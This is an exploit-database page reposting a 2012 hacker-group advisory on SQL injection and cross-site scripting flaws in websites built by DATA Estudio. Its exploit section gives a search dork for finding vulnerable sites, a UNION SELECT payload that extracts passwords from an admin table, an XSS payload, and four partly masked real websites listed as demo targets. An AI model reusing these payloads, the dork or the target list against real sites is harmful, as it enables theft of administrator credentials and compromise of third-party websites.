DATA Estudio SQL Injection & Cross-Site Scripting Vulnerabilities

2012.10.30
Credit: Ur0b0r0x
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 ============================================ 1 0 I'm Ur0b0r0x Member From Inj3ct0r TEAM 1 1 ============================================ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 | | | DATA Estudio - SQL Injection / Cross-Site Scripting Vulnerabilities | -------------------------------------------------------------------------- # Ab0ut M3 #################### # Author: Ur0b0r0x # Tiwtte: @Ur0b0r0x # Email: ur0b0r0x_4n1@live.com # InF0 ######################### # Exploit Title: DATA Estudio - SQL Injection / Cross-Site Scripting Vulnerabilities # Vendor Name: DATA Estudio # Url Vendor: http://www.dataestudio.com/ # Category: WebApps # Type: php # Risk: Critical # Dork: intext:" Powered by DATA Estudio :: ComunicaciĆ³n Visual" or intext:"Powered by DATA Estudio" # 0day exploits : 1337day.com Inj3ct0r Exploit DataBase # Expl0it ################### http://site.com/*.php?id= < Sql Vulnerability Path > http://site.com/*.php?id= < Xss Vulnerability Path > # Sql_Comand #=> +UNION+SELECT+1,password,3,4,5,6,7,8,9,10+from+admin # Xss_Comand #=> "><img src=x onerror=alert("1337");> # Dem0_Xss_Sql_Vulnerabilities http://www.paXXXterra.com.ar/print.php?id=35' http://www.emXXXnciapinamar.com.ar/novedades.php?id=42' http://www.vinXXXcadifain.com.ar/categorias.php?id=21' http://www.intXXXx.com.ar/contenidoArchivo.php?idnoticia=8379' # Gr3t'x ######################### >> All Member Inj3ct0r Team >> | Mr.Pack | Nick Nitrous | Revolution_Hackers | Dylan Irzi | R00tc0d3r's | SecurityDev | Mafia Dz | Algerian Hacker | >> And All H4x0r5

References:

http://www.dataestudio.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top